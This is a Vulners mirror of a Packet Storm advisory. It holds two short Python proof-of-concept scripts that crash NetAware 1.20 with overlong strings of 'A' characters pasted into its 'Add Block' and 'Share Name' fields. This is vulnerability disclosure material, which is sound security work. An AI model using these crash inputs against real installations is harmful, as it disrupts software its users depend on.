Lucene search
K

NetAware 1.20 Add Block / Share Name Denial Of Service

🗓️ 23 May 2019 00:00:00Reported by Alejandra SanchezType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 65 Views

NetAware 1.20 Add Block / Share Name Denial Of Service Po

Code
`# -*- coding: utf-8 -*-  
# Exploit Title: NetAware 1.20 - 'Add Block' Denial of Service (PoC)  
# Date: 22/05/2019  
# Author: Alejandra Sánchez  
# Vendor Homepage: https://www.infiltration-systems.com  
# Software: http://www.infiltration-systems.com/Files/netaware.zip  
# Version: 1.20  
# Tested on: Windows 7  
  
# Proof of Concept:  
# 1.- Run the python script 'NetAware.py', it will create a new file 'NetAware.txt'  
# 2.- Copy the text from the generated NetAware.txt file to clipboard  
# 3.- Open NetAware   
# 4.- Go to 'Settings' > 'User Blocking'  
# 5.- Click 'Add Block', paste clipboard in the field 'Add a website or keyword to be filtered...' and click 'OK'  
# 6.- Select the block created and click 'Remove', you will see a crash  
  
buffer = "\x41" * 512  
  
f = open ("NetAware.txt", "w")  
f.write(buffer)  
f.close()  
  
# -*- coding: utf-8 -*-  
# Exploit Title: NetAware 1.20 - 'Share Name' Denial of Service (PoC)  
# Date: 22/05/2019  
# Author: Alejandra Sánchez  
# Vendor Homepage: https://www.infiltration-systems.com  
# Software: http://www.infiltration-systems.com/Files/netaware.zip  
# Version: 1.20  
# Tested on: Windows 7  
  
# Proof of Concept:  
# 1.- Run the python script 'NetAware_share.py', it will create a new file 'NetAware.txt'  
# 2.- Copy the text from the generated NetAware.txt file to clipboard  
# 3.- Open NetAware   
# 4.- Click 'Manage Shares' > 'Add a New Share...'  
# 5.- Paste clipboard in the field 'Share Name', in the field 'Share Path' write anything, e.g. test and the field 'User Limit' select Maximum allowed  
# 6.- Click 'Ok', you will see a crash  
  
buffer = "\x41" * 1000  
  
f = open ("NetAware.txt", "w")  
f.write(buffer)  
f.close()  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation